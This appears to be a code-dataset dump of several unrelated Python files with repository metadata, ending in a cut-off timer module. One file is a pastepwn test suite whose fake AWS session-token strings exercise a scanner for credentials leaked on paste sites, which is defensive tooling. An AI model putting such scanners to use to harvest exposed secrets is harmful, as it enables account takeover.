cmp_log_fn = os.path.join(process_replay_dir, "%s_%s_%s.bz2" % (segment, cfg.proc_name, ref_commit))
r = requests.get(cmp_log_url)
if r.status_code == 200:
with open(cmp_log_fn, 'wb') as f:
f.write(r.content)
else:
print("Failed to download: " + cmp_log_url)
| 0 | 0 | 0 |
10d365fb463f6592b336de1f892b803c5ca65f1e | 926 | py | Python | sample/application/example/example/service/contact_service.py | problemfighter/pf-flask | c13a0d13284506cd5543ba596cc1077fe85c1075 | [
"Apache-2.0"
] | 5 | 2021-09-14T18:37:01.000Z | 2022-01-06T06:44:16.000Z | sample/application/example/example/service/contact_service.py | problemfighter/pf-flask | c13a0d13284506cd5543ba596cc1077fe85c1075 | [
"Apache-2.0"
] | null | null | null | sample/application/example/example/service/contact_service.py | problemfighter/pf-flask | c13a0d13284506cd5543ba596cc1077fe85c1075 | [
"Apache-2.0"
] | null | null | null | from example.dto.contact_dto import ContactCreateDto, ContactUpdateDto, ContactDetailsDto
from example.model.contact import Contact
from pf_sqlalchemy.crud.pfs_rest_helper_service import PfsRestHelperService
pfs_rest_helper_service = PfsRestHelperService(Contact)
| 31.931034 | 89 | 0.771058 | from example.dto.contact_dto import ContactCreateDto, ContactUpdateDto, ContactDetailsDto
from example.model.contact import Contact
from pf_sqlalchemy.crud.pfs_rest_helper_service import PfsRestHelperService
pfs_rest_helper_service = PfsRestHelperService(Contact)
class ContactService:
    """Service facade for Contact CRUD, delegating to the shared REST helper."""

    def create(self):
        """Create a contact via the REST helper."""
        return pfs_rest_helper_service.rest_create(ContactCreateDto())

    def update(self):
        """Update a contact via the REST helper."""
        return pfs_rest_helper_service.rest_update(ContactUpdateDto())

    def details(self, model_id: int):
        """Fetch one contact by id."""
        return pfs_rest_helper_service.rest_details(model_id, ContactDetailsDto())

    def delete(self, model_id: int):
        """Delete a contact by id."""
        return pfs_rest_helper_service.rest_delete(model_id)

    def restore(self, model_id: int):
        """Restore a contact by id (counterpart to delete)."""
        return pfs_rest_helper_service.rest_restore(model_id)

    def list(self):
        """List contacts; no search filters are applied by default."""
        return pfs_rest_helper_service.rest_list(ContactDetailsDto(), search=[])
473f1e1eeb6b340b2ca16fc3da17da150f626195 | 661 | py | Python | setup.py | libre-man/DJFeet | 7517e7930bdc23d22765c64d7351d4011515dcaa | [
"MIT"
] | 2 | 2018-09-29T22:41:28.000Z | 2018-10-02T16:07:11.000Z | setup.py | libre-man/DJFeet | 7517e7930bdc23d22765c64d7351d4011515dcaa | [
"MIT"
] | null | null | null | setup.py | libre-man/DJFeet | 7517e7930bdc23d22765c64d7351d4011515dcaa | [
"MIT"
] | null | null | null | try:
from setuptools import setup
except ImportError:
from distutils.core import setup
config = {
'description': 'A program does that is a DJ by using feedback provided by the dancers.',
'author': 'Thomas Schaper',
'url': 'https://gitlab.com/SilentDiscoAsAService/DJFeet',
'download_url': 'https://gitlab.com/SilentDiscoAsAService/DJFeet',
'author_email': 'thomas@libremail.nl',
'version': '0.0',
'install_requires': ['nose'],
'packages': ['dj_feet'],
'scripts': [],
'entry_points': {
'console_scripts': [
'server = dj_feet.cli:main'
]
},
'name': 'dj_feet'
}
setup(**config)
| 26.44 | 92 | 0.621785 | try:
from setuptools import setup
except ImportError:
from distutils.core import setup
config = {
'description': 'A program does that is a DJ by using feedback provided by the dancers.',
'author': 'Thomas Schaper',
'url': 'https://gitlab.com/SilentDiscoAsAService/DJFeet',
'download_url': 'https://gitlab.com/SilentDiscoAsAService/DJFeet',
'author_email': 'thomas@libremail.nl',
'version': '0.0',
'install_requires': ['nose'],
'packages': ['dj_feet'],
'scripts': [],
'entry_points': {
'console_scripts': [
'server = dj_feet.cli:main'
]
},
'name': 'dj_feet'
}
setup(**config)
| 0 | 0 | 0 |
b47744010a6348034a70d84f8b9a77662479b6f6 | 2,630 | py | Python | pastepwn/analyzers/tests/awssessiontokenanalyzer_test.py | palaparthi/pastepwn | 62b8b4e0100a55aa0db6f3441a272770e9b9d23b | [
"MIT"
] | null | null | null | pastepwn/analyzers/tests/awssessiontokenanalyzer_test.py | palaparthi/pastepwn | 62b8b4e0100a55aa0db6f3441a272770e9b9d23b | [
"MIT"
] | null | null | null | pastepwn/analyzers/tests/awssessiontokenanalyzer_test.py | palaparthi/pastepwn | 62b8b4e0100a55aa0db6f3441a272770e9b9d23b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import unittest
from unittest import mock
from pastepwn.analyzers.awssessiontokenanalyzer import AWSSessionTokenAnalyzer
if __name__ == '__main__':
unittest.main()
| 39.848485 | 101 | 0.675285 | # -*- coding: utf-8 -*-
import unittest
from unittest import mock
from pastepwn.analyzers.awssessiontokenanalyzer import AWSSessionTokenAnalyzer
class TestAWSSessionTokenAnalyzer(unittest.TestCase):
    """Tests for AWSSessionTokenAnalyzer's paste-matching behaviour."""

    def setUp(self):
        # Fresh analyzer and mock paste for every test case.
        self.analyzer = AWSSessionTokenAnalyzer(None)
        self.paste = mock.Mock()

    # Renamed from test_mach_positive: fixed the "mach" typo so the name
    # matches its negative counterpart (unittest still discovers it).
    def test_match_positive(self):
        """Test if positives are recognized"""
        self.paste.body = "'aws_session_token'\\\\ssss:\\\\ssss'AiughaiusDWIHJFUFERHO2134234'"
        self.assertTrue(self.analyzer.match(self.paste))
        self.paste.body = "'aws'\\\\ssss:\\\\ssss'auyhguywgerdbyubduiywebh'"
        self.assertTrue(self.analyzer.match(self.paste))
        self.paste.body = "'aws_session'\\\\ssss:\\\\ssss'YTUF5GUY76ibuihIUIU98jJB+//='"
        self.assertTrue(self.analyzer.match(self.paste))
        self.paste.body = "'aws_session_token'\\\\s:\\\\s'auyhguywgerdbyubduiywebh'"
        self.assertTrue(self.analyzer.match(self.paste))
        self.paste.body = "'aws_session_token'\\\\:\\\\'auyhguywgerdbyubduiywebh'"
        self.assertTrue(self.analyzer.match(self.paste))
        self.paste.body = "'aws_session_token'\\\\:\\\\'auyhguywgerdbyubduiywebh'"
        self.assertTrue(self.analyzer.match(self.paste))
        self.paste.body = "\\\\ssssssssssssssssssssss:\\\\ssssssssssssssss'auyhguywgerdbyubduiywebh'"
        self.assertTrue(self.analyzer.match(self.paste))
        self.paste.body = "\\\\=\\\\'auyhguywgerdbyubduiywebh'"
        self.assertTrue(self.analyzer.match(self.paste))
        self.paste.body = "\\\\=>\\\\'auyhguywgerdbyubduiywebh'"
        self.assertTrue(self.analyzer.match(self.paste))

    def test_match_negative(self):
        """Test if negatives are recognized"""
        self.paste.body = "\\\\ssss:\\\\ssss'Aiughai'"
        self.assertFalse(self.analyzer.match(self.paste))
        self.paste.body = "'aws_session'\\ssss:\\\\ssss'YTUF5GUY76ibuihIUIU98jJB+ÒÈÒà'"
        self.assertFalse(self.analyzer.match(self.paste))
        self.paste.body = "'aws_session_asd'\\\\aaa:\\\\ssss'auyhguywgerdbyubduiywebh'"
        self.assertFalse(self.analyzer.match(self.paste))
        self.paste.body = "\"aws_session\"\\\\ssss:\\ssss'auyhguywgerdbyubduiywebh'"
        self.assertFalse(self.analyzer.match(self.paste))
        self.paste.body = "'aws_session'\\\\ssss$\\\\ssss'auyhguywgerdbyubduiywebh'"
        self.assertFalse(self.analyzer.match(self.paste))
        self.paste.body = "'aws_session'\\\\ssss:\\\\ssss\"auyhguywgerdbyubduiywebh\""
        self.assertFalse(self.analyzer.match(self.paste))
if __name__ == '__main__':
unittest.main()
| 82 | 2,333 | 23 |
0cb7f32b56d33e46178c5453ac04b0c73f36c8c5 | 2,336 | py | Python | erpx_hrm/www/hr/index.py | neel2292/erpx_hrm | a58947f8d921593fd3a8cda0db33ffae253ce75e | [
"MIT"
] | null | null | null | erpx_hrm/www/hr/index.py | neel2292/erpx_hrm | a58947f8d921593fd3a8cda0db33ffae253ce75e | [
"MIT"
] | null | null | null | erpx_hrm/www/hr/index.py | neel2292/erpx_hrm | a58947f8d921593fd3a8cda0db33ffae253ce75e | [
"MIT"
] | null | null | null | import frappe
import json
from datetime import timedelta, date
| 42.472727 | 236 | 0.611729 | import frappe
import json
from datetime import timedelta, date
def get_context(context):
	"""Populate the website context for the HR landing page.

	Redirects guests to '/', then attaches the logged-in user's employee
	record, branch, upcoming approved leave and upcoming birthdays.
	"""
	# Guests may not view the HR dashboard; bounce them to the home page.
	if frappe.session.user == 'Guest':
		frappe.local.flags.redirect_location = '/'
		raise frappe.Redirect
	context.user = frappe.session.user
	context.user_doc = frappe.session
	# CSRF token for client-side POST requests made from this page.
	context.csrf_token = frappe.sessions.get_csrf_token()
	# Employee(s) matched by company email -- presumably at most one;
	# verify against how Employee records are created.
	context.emp_doc = frappe.get_list('Employee',
		{ 'company_email': frappe.session.user },
		['name', 'company', 'date_of_joining', 'branch']
	)
	#Get employee info
	context.employee = None
	if frappe.db.exists("Employee", {'user_id': frappe.session.user}):
		employee = frappe.get_doc("Employee", {"user_id": context.user}) or None
		context.employee = employee or None
	else:
		# NOTE(review): unsaved placeholder doc; only used for the branch
		# lookup below, where its empty fields skip the lookup -- confirm.
		employee = frappe.new_doc("Employee")
	#Get branch info
	branch = ""
	if employee and employee.branch:
		branch = frappe.get_doc("Branch", {"name": employee.branch}) or ""
	context.branch = branch or None
	#Get list of Leave Application info
	from_date = date.today().strftime("%Y-%m-%d")
	to_date = (date.today() + timedelta(days=7)).strftime("%Y-%m-%d")
	# Approved leave applications overlapping [today, today + 7 days],
	# one row per employee with the dates collapsed into an HTML snippet.
	leave_application_list = frappe.db.sql("""select e.image, l.employee, l.employee_name, from_date, to_date, group_concat(IF(l.from_date != l.to_date, CONCAT_WS('->',l.from_date,l.to_date), l.to_date) SEPARATOR '<br>') as leave_date
		from `tabLeave Application` as l
		inner join `tabEmployee` as e on l.employee = e.name
		where
		((from_date >= %s and from_date <= %s) or (to_date >= %s and to_date <= %s))
		and l.docstatus = 1 and l.status = "Approved"
		group by l.employee
		""", (from_date, to_date, from_date, to_date), as_dict = True)
	context.leave_application_list = leave_application_list or None
	#Get list of employee info
	# Employees whose birthday (by day-of-year) falls in the next week.
	# NOTE(review): the DayOfYear range does not wrap across year-end --
	# confirm whether that edge case matters here.
	employee_list = frappe.db.sql("""select image, employee_name, date_of_birth
		from `tabEmployee`
		where DayOfYear(date_of_birth) between DayOfYear(%s) and DayOfYear(%s)
		""", (from_date, to_date), as_dict = True)
	context.employee_list = employee_list or None
	return context
| 2,250 | 0 | 23 |
077879dc538f7f7a677cd28f4702fd679248dc27 | 7,512 | py | Python | stockdaq/acquisiter/acquisiter.py | terrencetec/stockdaq | 8561b1d1b94b6091dfe4d9ebf2fc84daa2d571d6 | [
"MIT"
] | null | null | null | stockdaq/acquisiter/acquisiter.py | terrencetec/stockdaq | 8561b1d1b94b6091dfe4d9ebf2fc84daa2d571d6 | [
"MIT"
] | 7 | 2021-01-08T01:02:58.000Z | 2021-01-12T17:38:03.000Z | stockdaq/acquisiter/acquisiter.py | terrencetec/stockdaq | 8561b1d1b94b6091dfe4d9ebf2fc84daa2d571d6 | [
"MIT"
] | null | null | null | """Data acquisition system.
"""
import datetime
import os
import sys
import time
import stockdaq.data.downloader_dict
from stockdaq.logger import logger
class Acquisiter:
    """Data Acquisiter.

    Downloads data for every symbol in `stocklist` from the first API in
    `api_list` that succeeds, and exports it into a directory tree under
    `root_dir` laid out according to `file_structure`.  In rolling mode
    the whole update is repeated every `database_update_interval` seconds.

    Attributes
    ----------
    stocklist: list of str
        List of symbols of stocks of interest.
    api_config_path: str
        Path to the API configuration file.
    apikey_dict: dict
        A dictionary of API keys in {"api": "key"} pairs.
    api_list: list of str
        List of APIs, in preferred order.
        Options are ["Alpha Vantage",].
    root_dir: str
        The root directory of the database.
    frequency: str
        "intraday", "daily", "weekly", "monthly".
        Options are ["intraday"].
    file_structure: list of str
        How to set up parent/child folders.
        Defaults to ["symbol", "frequency", "data"].
    rolling: bool
        If True, keep updating the database indefinitely.
    api_call_interval: datetime.timedelta
        Minimal delay between API calls.
    database_update_interval: datetime.timedelta
        Interval between database updates in rolling mode.
    """

    def __init__(self, stocklist, api_config_path, apikey_dict,
                 api_list=None, frequency="intraday", root_dir="./",
                 file_structure=None,
                 rolling=False, api_call_interval=12,
                 database_update_interval=86400):
        """Constructor.

        Parameters
        ----------
        stocklist: list of str
            List of symbols of stocks of interest.
        api_config_path: str
            Path to the API configuration file.
        apikey_dict: dict
            A dictionary of API keys in {"api": "key"} pairs.
        api_list: list of str, optional
            List of APIs, in preferred order.
            Defaults to ["Alpha Vantage"].
        root_dir: str, optional
            The root directory of the database.
        frequency: str, optional
            "intraday", "daily", "weekly", "monthly".
        file_structure: list of str, optional
            How to set up parent/child folders.
            Defaults to ["symbol", "frequency", "data"].
        rolling: bool, optional
            Rolling update.  Rate limited by API request limitations
            set in the API configuration file.  Defaults to False.
        api_call_interval: int, optional
            Minimal delay (seconds) between API calls.
            Use your API's limitation to derive this value.  Defaults to 12.
        database_update_interval: int, optional
            Interval (seconds) between each database update.
            Defaults to 86400 (1 day).
        """
        # None-defaults avoid sharing one mutable default list between
        # instances (classic mutable-default pitfall).
        self.stocklist = stocklist
        self.root_dir = root_dir
        self.api_config_path = api_config_path
        self.api_list = ["Alpha Vantage"] if api_list is None else api_list
        self.apikey_dict = apikey_dict
        self.frequency = frequency
        self.file_structure = (["symbol", "frequency", "data"]
                               if file_structure is None else file_structure)
        self.rolling = rolling
        self.api_call_interval = datetime.timedelta(seconds=api_call_interval)
        self.database_update_interval = datetime.timedelta(
            seconds=database_update_interval)

    def update_database(self, download_kwargs=None, export_kwargs=None):
        """Get stock data from API and update database.

        In rolling mode this loops forever (iteratively, not recursively,
        so arbitrarily many update cycles cannot overflow the stack).

        Parameters
        ----------
        download_kwargs: dict, optional
            Keyword arguments passed to
            stockdaq.data.downloader.YourDownloader.download() method.
        export_kwargs: dict, optional
            Keyword arguments passed to
            stockdaq.data.downloader.Downloader.export() method.
            An optional "prefix" entry is appended to the directory prefix
            derived from `file_structure`.  The caller's dict is never
            modified (the original implementation mutated the shared
            default dict via export_kwargs["prefix"] = None).
        """
        download_kwargs = dict(download_kwargs) if download_kwargs else {}
        export_kwargs = dict(export_kwargs) if export_kwargs else {}
        user_prefix = export_kwargs.get("prefix")
        while True:
            last_update_datetime = datetime.datetime.now()
            for symbol in self.stocklist:
                for api in self.api_list:
                    try:
                        apikey = self.apikey_dict[api]
                        downloader = (
                            stockdaq.data.downloader_dict.downloader_dict[api](
                                apikey=apikey
                            )
                        )
                        downloader.download(
                            symbol=symbol, frequency=self.frequency,
                            **download_kwargs
                        )
                        last_api_call_datetime = datetime.datetime.now()
                        # Directory part of the prefix, created on demand.
                        prefix = self.get_prefix(symbol=symbol)
                        if not os.path.isdir(prefix):
                            os.makedirs(prefix)
                        # Append the caller-supplied prefix, if any.
                        if user_prefix is not None:
                            prefix += user_prefix
                        new_export_kwargs = dict(export_kwargs)
                        new_export_kwargs["prefix"] = prefix
                        downloader.export(**new_export_kwargs)
                        # Respect the per-call API rate limit.
                        while (datetime.datetime.now() - last_api_call_datetime <
                                self.api_call_interval):
                            time.sleep(1)
                        break  # Break out of the api loop when success
                    except ValueError as err:
                        logger.error("Error encountered when trying to acquisite "
                                     "symbol: {} data from API: {}\nError message:"
                                     "\n{}"
                                     "".format(symbol, api, err))
                    except:
                        print("Unexpected error:", sys.exc_info()[0])
                        raise
            logger.info("Database update finished.")
            if not self.rolling:
                return
            next_update_datetime = (last_update_datetime
                                    + self.database_update_interval)
            logger.info("Rolling update enabled, "
                        "next update is scheduled at "
                        "{}.".format(str(next_update_datetime)))
            while datetime.datetime.now() < next_update_datetime:
                time.sleep(1)

    def get_prefix(self, symbol):
        """Get path prefix for a specific data.

        Parameters
        ----------
        symbol: str
            The stock symbol.

        Returns
        -------
        prefix: str
            The prefix of the file path, e.g. "./AAPL/intraday/".

        Raises
        ------
        ValueError
            If `file_structure` contains an unknown folder name.
        """
        prefix = self.root_dir
        for folder in self.file_structure:
            if folder == "data":
                break  # "data" marks the leaf level: stop building dirs
            elif folder == "frequency":
                prefix += self.frequency + "/"
            elif folder == "symbol":
                prefix += symbol + "/"
            else:
                raise ValueError("{} structure not available.".format(folder))
        return prefix
| 36.823529 | 79 | 0.545793 | """Data acquisition system.
"""
import datetime
import os
import sys
import time
import stockdaq.data.downloader_dict
from stockdaq.logger import logger
class Acquisiter:
"""Data Acquisiter
Parameters
----------
stocklist: list of str
List of symbols of stocks of interest.
apikey_dict: dict
A dictionary of API keys in {"api":"key"} pairs.
api_list: list of str, optional
List of APIs, in preferred order.
Options are ["Alpha Vantage",]
root_dir: str, optional
The root directory of the database.
frequency: str, optional
"intraday", "daily", "weekly", "monthly"
Options are ["intraday"].
file_structure: list of str, optional
How to set up parent/child folders.
Defaults to ["symbol", "frequency", "data"].
Attributes
----------
stocklist: list of str
List of symbols of stocks of interest.
apikey_dict: dict
A dictionary of API keys in {"api":"key"} pairs.
api_list: list of str, optional
List of APIs, in preferred order.
Options are ["Alpha Vantage",]
root_dir: str, optional
The root directory of the database.
frequency: str, optional
"intraday", "daily", "weekly", "monthly"
Options are ["intraday"].
file_structure: list of str, optional
How to set up parent/child folders.
Defaults to ["symbol", "frequency", "data"].
"""
def __init__(self, stocklist, api_config_path, apikey_dict,
api_list=["Alpha Vantage",],frequency="intraday", root_dir="./",
file_structure=["symbol", "frequency", "data"],
rolling=False, api_call_interval=12,
database_update_interval=86400):
"""Constructor
Parameters
----------
stocklist: list of str
List of symbols of stocks of interest.
api_config_path: str
Path to the API configuration file.
apikey_dict: dict
A dictionary of API keys in {"api":"key"} pairs.
api_list: list of str, optional
List of APIs, in preferred order.
Options are ["Alpha Vantage",]
root_dir: str, optional
The root directory of the database.
frequency: str, optional
"intraday", "daily", "weekly", "monthly"
Options are ["intraday"].
file_structure: list of str, optional
How to set up parent/child folders.
Defaults to ["symbol", "frequency", "data"].
rolling: boolean, optional
Rolling update. Rate limited by API requestion limitations
set in the API configuration file.
Defaults to be False.
api_call_interval: int, optional
Minimal delay (seconds) between API calls.
Use your API's limitation to derive this value.
Defaults to 12.
database_update_interval: int, optional
Interval (seconds) between each database update.
Defaults to 86400 (1 day).
"""
self.stocklist = stocklist
self.root_dir = root_dir
self.api_config_path = api_config_path
self.api_list = api_list
self.apikey_dict = apikey_dict
self.frequency = frequency
self.file_structure = file_structure
self.rolling = rolling
self.api_call_interval = datetime.timedelta(seconds=api_call_interval)
self.database_update_interval = datetime.timedelta(
seconds=database_update_interval)
def update_database(self, download_kwargs={}, export_kwargs={}):
"""Get stock data from API and update datebase.
Parameters
----------
downloader_kwargs: dict
Keyword arguments passed to
stockdaq.data.downloader.YourDownloader.download() method.
export_kwargs: dict
Keyword arguments passed to
stockdaq.data.downloader.Downloader.export() method.
"""
# api = self.api_list[0]
# apikey = self.apikey_dict[api]
# downloader = stockdaq.data.downloader_dict.downloader_dict[api](
# apikey=apikey
# )
last_update_datetime = datetime.datetime.now()
for symbol in self.stocklist:
for api in self.api_list:
try:
apikey = self.apikey_dict[api]
downloader = (
stockdaq.data.downloader_dict.downloader_dict[api](
apikey=apikey
)
)
downloader.download(
symbol=symbol, frequency=self.frequency,
**download_kwargs
)
last_api_call_datetime = datetime.datetime.now()
# Now prefix is the dir.
prefix = self.get_prefix(symbol=symbol)
if not os.path.isdir(prefix):
os.makedirs(prefix)
# Now add the customized prefix
try:
export_kwargs["prefix"]
except KeyError:
export_kwargs["prefix"] = None
if export_kwargs["prefix"] is not None:
prefix += export_kwargs["prefix"]
new_export_kwargs = dict(export_kwargs)
new_export_kwargs["prefix"] = prefix
downloader.export(**new_export_kwargs)
while (datetime.datetime.now() - last_api_call_datetime <
self.api_call_interval):
time.sleep(1)
break # Break out of the api loop when success
except ValueError as err:
logger.error("Error encountered when trying to acquisite "
"symbol: {} data from API: {}\nError message:"
"\n{}"
"".format(symbol, api, err))
except:
print("Unexpected error:", sys.exc_info()[0])
raise
logger.info("Database update finished.")
if self.rolling:
next_update_datetime = (last_update_datetime
+ self.database_update_interval)
logger.info("Rolling update enabled, "
"next update is scheduled at "
"{}.".format(str(next_update_datetime)))
while datetime.datetime.now() < next_update_datetime:
time.sleep(1)
self.update_database(
download_kwargs=download_kwargs, export_kwargs=export_kwargs
)
def get_prefix(self, symbol):
"""Get path prefix for a specific data.
Parameters
----------
symbol: str
The stock symbol.
Returns
-------
prefix: str
The prefix of the file path.
"""
prefix = self.root_dir+""
for folder in self.file_structure:
if folder == "data":
break
elif folder == "frequency":
prefix += self.frequency+"/"
elif folder == "symbol":
prefix += symbol+"/"
else:
raise ValueError("{} structure not available.".format(folder))
return prefix
| 0 | 0 | 0 |
0bf59a8f57abd08c08979c8994ad2b936ec6305d | 6,777 | py | Python | src/hio/help/timing.py | pfeairheller/hio | 44669adb62c81357491f9f6157312bc1313b56cf | [
"Apache-2.0"
] | 2 | 2020-12-09T17:26:25.000Z | 2021-05-07T02:21:57.000Z | src/hio/help/timing.py | pfeairheller/hio | 44669adb62c81357491f9f6157312bc1313b56cf | [
"Apache-2.0"
] | 4 | 2021-03-30T20:50:19.000Z | 2022-01-06T17:16:18.000Z | src/hio/help/timing.py | pfeairheller/hio | 44669adb62c81357491f9f6157312bc1313b56cf | [
"Apache-2.0"
] | 3 | 2021-04-08T19:35:36.000Z | 2021-06-03T13:39:05.000Z | # -*- encoding: utf-8 -*-
"""
hio.help.timing module
"""
import time
from .. import hioing
class TimerError(hioing.HioError):
    """
    Base class for timer-related errors.

    Usage:
        raise TimerError("error message")
    """
class RetroTimerError(TimerError):
    """
    Raised when the real-time clock is retrograded past a running
    timer's start time and automatic adjustment is disabled.

    Usage:
        raise RetroTimerError("error message")
    """
class Timer(hioing.Mixin):
    """
    Real elapsed-time timer built on the time module.

    Attributes:
        ._start is the start time in seconds
        ._stop is the stop time in seconds

    Properties:
        .duration is the float timer duration in seconds (._stop - ._start)
        .elapsed is the float seconds elapsed since ._start
        .remaining is the float seconds remaining until ._stop
        .expired is True once the current time reaches ._stop

    Methods:
        .start() starts the timer at the current time
        .restart() restarts the timer at the previous ._stop so no time is lost
    """
    def __init__(self, duration=0.0, start=None, **kwa):
        """
        Initialize the timer.

        Parameters:
            duration is the float timer duration in seconds (fractional)
            start is an optional float start time in seconds; allows the
                timer to begin before or after the current time
        """
        super(Timer, self).__init__(**kwa)  # Mixin for multi-inheritance MRO
        self._start = time.time() if start is None else float(start)
        self._stop = self._start + float(duration)  # needed for default duration
        self.start(duration=duration, start=start)

    @property
    def duration(self):
        """
        Float duration of the timer in seconds, ._stop - ._start.
        """
        return self._stop - self._start

    @property
    def elapsed(self):
        """
        Float seconds (fractional) elapsed since ._start.
        """
        return time.time() - self._start

    @property
    def remaining(self):
        """
        Float seconds (fractional) remaining before ._stop.
        """
        return self._stop - time.time()

    @property
    def expired(self):
        """
        True once time.time() >= ._stop, False otherwise.
        """
        return time.time() >= self._stop

    def start(self, duration=None, start=None):
        """
        Start the timer for duration seconds at time start.

        Falls back to the current duration when duration is not provided,
        and to time.time() when start is not provided.
        Returns the start time.
        """
        if duration is None:
            duration = self.duration  # keep the current duration
        else:
            duration = float(duration)
        self._start = time.time() if start is None else float(start)
        self._stop = self._start + duration
        return self._start

    def restart(self, duration=None):
        """
        Lossless restart at start == ._stop, for duration seconds if
        provided, otherwise the current duration.  Useful to extend the
        timer with no time lost.  Returns the new start time.
        """
        return self.start(duration=duration, start=self._stop)
class MonoTimer(Timer):
    """
    Class to manage real elapsed time using the time module but with a
    monotonically increasing time guarantee in spite of system time being
    retrograded.

    If the system clock is retrograded (moved back in time) while the timer is
    running then time.time() could move to before the start time.

    MonoTimer detects this retrograde and, if .retro is True, retrogrades
    the start and stop times back.  Otherwise it raises a RetroTimerError.

    MonoTimer is not able to detect a prograded clock (moved forward in time).

    Attributes:
        ._start is start time in seconds
        ._stop is stop time in seconds
        ._last is last measured time in seconds with retrograde handling
        .retro is boolean If True retrograde ._start and ._stop when time is retrograded.

    Properties:
        .duration is float time duration in seconds of timer from ._start to ._stop
        .elapsed is float time elapsed in seconds since ._start
        .remaining is float time remaining in seconds until ._stop
        .expired is boolean True if expired, False otherwise, i.e. time >= ._stop
        .latest is float latest measured time in seconds with retrograde handling

    methods:
        .start() = start timer at current time, returns start time
        .restart() = restart timer at last ._stop so no time lost, returns start time
    """
    def __init__(self, duration=0.0, start=None, retro=True):
        """
        Initialization method for instance.

        Parameters:
            duration in seconds (fractional)
            start is float optional start time in seconds allows starting before
                or after current time
            retro is boolean If True automatically shift timer whenever a
                retrograded clock is detected, otherwise raise RetroTimerError
        """
        # NOTE(review): deliberately re-implements Timer.__init__ instead of
        # calling super() so that ._last is set before .start() runs; keep in
        # sync with Timer.__init__ if that changes.
        self._start = float(start) if start is not None else time.time()
        self._stop = self._start + float(duration) # need for default duration
        self._last = self._start
        self.retro = True if retro else False  # ensure boolean
        self.start(duration=duration, start=start)

    @property
    def elapsed(self):
        """
        elapsed time property getter,
        Returns elapsed time in seconds (fractional) since ._start,
        measured via .latest so a retrograded clock cannot make it negative.
        """
        return (self.latest - self._start)

    @property
    def remaining(self):
        """
        remaining time property getter,
        Returns remaining time in seconds (fractional) before ._stop,
        measured via .latest for retrograde safety.
        """
        return (self._stop - self.latest)

    @property
    def expired(self):
        """
        Returns True if timer has expired, False otherwise.
        .latest >= ._stop,
        """
        return (self.latest >= self._stop)

    @property
    def latest(self):
        """
        latest measured time property getter,
        Returns latest measured time in seconds adjusted for retrograded system time.
        Note: reading this property mutates ._last (and possibly ._start/._stop).
        """
        delta = time.time() - self._last  # current time - last time checked
        if delta < 0:  # system clock has retrograded
            if self.retro:
                # Shift the whole timer window back by the same amount so
                # duration/elapsed/remaining stay self-consistent.
                self._start += delta
                self._stop += delta
            else:
                raise RetroTimerError("System time retrograded by {0} seconds"
                                      " while timer running.".format(delta))
        self._last += delta
        return self._last
| 32.581731 | 89 | 0.626531 | # -*- encoding: utf-8 -*-
"""
hio.help.timing module
"""
import time
from .. import hioing
class TimerError(hioing.HioError):
"""
Generic Timer Errors
Usage:
raise TimerError("error message")
"""
class RetroTimerError(TimerError):
"""
Error due to real time being retrograded before start time of timer
Usage:
raise RetroTimerError("error message")
"""
class Timer(hioing.Mixin):
"""
Class to manage real elaspsed time using time module.
Attributes:
._start is start tyme in seconds
._stop is stop tyme in seconds
Properties:
.duration is float time duration in seconds of timer from ._start to ._stop
.elaspsed is float time elasped in seconds since ._start
.remaining is float time remaining in seconds until ._stop
.expired is boolean, True if expired, False otherwise, i.e. time >= ._stop
methods:
.start() start timer at current time
.restart() = restart timer at last ._stop so no time lost
"""
def __init__(self, duration=0.0, start=None, **kwa):
"""
Initialization method for instance.
Parameters:
duration is float duration of timer in seconds (fractional)
start is float optional start time in seconds allows starting before
or after current time
"""
super(Timer, self).__init__(**kwa) # Mixin for Mult-inheritance MRO
self._start = float(start) if start is not None else time.time()
self._stop = self._start + float(duration) # need for default duration
self.start(duration=duration, start=start)
@property
def duration(self):
"""
duration property getter, .duration = ._stop - ._start
.duration is float duration tyme
"""
return (self._stop - self._start)
@property
def elapsed(self):
"""
elapsed time property getter,
Returns elapsed time in seconds (fractional) since ._start.
"""
return (time.time() - self._start)
@property
def remaining(self):
"""
remaining time property getter,
Returns remaining time in seconds (fractional) before ._stop.
"""
return (self._stop - time.time())
@property
def expired(self):
"""
Returns True if timer has expired, False otherwise.
time.time() >= ._stop,
"""
return (time.time() >= self._stop)
def start(self, duration=None, start=None):
"""
Starts Timer of duration secs at start time start secs.
If duration not provided then uses current duration
If start not provided then starts at current time.time()
"""
# remember current duration when duration not provided
duration = float(duration) if duration is not None else self.duration
self._start = float(start) if start is not None else time.time()
self._stop = self._start + duration
return self._start
def restart(self, duration=None):
"""
Lossless restart of Timer at start = ._stop for duration if provided,
Otherwise current duration.
No time lost. Useful to extend Timer so no time lost
"""
return self.start(duration=duration, start=self._stop)
class MonoTimer(Timer):
"""
Class to manage real elaspsed time using time module but with monotonically
increating time guarantee in spite of system time being retrograded.
If the system clock is retrograded (moved back in time) while the timer is
running then time.time() could move to before the start time.
MonoTimer detects this retrograde and if retro is True then
retrogrades the start and stop times back Otherwise it raises a TimerRetroError.
MonoTimer is not able to detect a prograded clock (moved forward in time)
Attributes:
._start is start time in seconds
._stop is stop time in seconds
._last is last measured time in seconds with retrograde handling
.retro is boolean If True retrograde ._start and ._stop when time is retrograded.
Properties:
.duration is float time duration in seconds of timer from ._start to ._stop
.elaspsed is float time elasped in seconds since ._start
.remaining is float time remaining in seconds until ._stop
.expired is boolean True if expired, False otherwise, i.e. time >= ._stop
.latest is float latest measured time in seconds with retrograte handling
methods:
.start() = start timer at current time returns start time
.restart() = restart timer at last ._stop so no time lost, returns start time
"""
def __init__(self, duration=0.0, start=None, retro=True):
"""
Initialization method for instance.
Parameters:
duration in seconds (fractional)
start is float optional start time in seconds allows starting before
or after current time
retro is boolean IF True automaticall shift timer whenever
retrograded clock detected Otherwise ignore
"""
self._start = float(start) if start is not None else time.time()
self._stop = self._start + float(duration) # need for default duration
self._last = self._start
self.retro = True if retro else False # ensure boolean
self.start(duration=duration, start=start)
@property
def elapsed(self):
"""
elapsed time property getter,
Returns elapsed time in seconds (fractional) since ._start.
"""
return (self.latest - self._start)
@property
def remaining(self):
"""
remaining time property getter,
Returns remaining time in seconds (fractional) before ._stop.
"""
return (self._stop - self.latest)
@property
def expired(self):
"""
Returns True if timer has expired, False otherwise.
.latest >= ._stop,
"""
return (self.latest >= self._stop)
@property
def latest(self):
"""
latest measured time property getter,
Returns latest measured time in seconds adjusted for retrograded system time.
"""
delta = time.time() - self._last # current time - last time checked
if delta < 0: # system clock has retrograded
if self.retro:
self._start += delta
self._stop += delta
else:
raise RetroTimerError("System time retrograded by {0} seconds"
